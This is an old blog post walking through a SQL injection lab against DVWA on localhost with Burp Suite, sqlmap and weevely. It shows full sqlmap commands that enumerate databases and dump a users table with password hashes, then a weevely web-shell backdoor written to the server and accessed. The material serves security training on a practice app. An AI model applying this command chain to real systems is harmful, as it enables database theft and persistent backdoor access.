Rabu, 26 Desember 2012

SQL INJECTION


Mantra is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers,security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

first open Mantra Tools on Backtrack Menu. Type the command

root@bt:/pentest/web/mantra# ls
Mantra  OWASP Mantra
root@bt:/pentest/web/mantra# ./OWASP\ Mantra 

Show it


Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.


Show It



Now we will try injection in database localhost / dvwa.
Previously, we created a database dvwa.
Type the command


mysql -u –root -p
mysql> create database dvwa;

then, try to go to localhost / dvwa in browser spell.
user: admin
password: password


If success, set the DVWA Security to Low. And then choose SQL Injection

before we have the proxy settings
type up to us (test) in the User Id Column- SUBMIT .



LOOK On Burp Suite. We Will get some Iformation of  localhost/dvwa



Now, we try on sqlmap

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2" --dbs

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

we will get tables of dvwa database

available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

[03:22:02] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at 03:22:02

after we get the database, look at the table on dvwa. Type the command

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2" -D dvwa --tables

the result is
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

after that, we look at the contents of the users table with type the command

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2" -D dvwa -T users --dump

the result is

Database: dvwa

Table: users
[5 entries]
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
| user_id | user | avatar | password | last_name | first_name |
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
| 1 | admin | http://localhost/dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin |
| 2 | gordonb | http://localhost/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon |
| 3 | 1337 | http://localhost/dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack |
| 4 | pablo | http://localhost/dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo |
| 5 | smithy | http://localhost/dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob |
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+

after success and was able to read the contents of the table users, it's time to make a backdoor entry so that we can easily.
type the command

root@bt:/pentest/database/sqlmap# cd

root@bt:~# /pentest/backdoors/web/weevely/

root@bt:/pentest/backdoors/web/weevely# ls

root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate password /root/tes.php



after backdoor we make, it's time to upload to var/www/dvwa/tes.php by typing the command


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2" --file-write=/root/tes.php --file-dest=/var/www/dvwa/tes.php

[22:24:36] [INFO] the back-end DBMS operating system is Linux
[22:24:36] [INFO] heuristics detected web page charset 'ascii'
do you want confirmation that the file '/var/www/dvwa/tes.php' has been successfully written on the back-end DBMS file system? [Y/n]  choose Y or Enter


and Then, Upload the backdoor tho DVWA Database
Type the command

root@bt:/pentest/backdoors/web/weevely#./weevely.py http://localhost/dvwa/tes.php password
then,
www-data@bt:/var/www/dvwa$ ls


if successful, it will display the results


Good Luck ..















0 komentar:

Posting Komentar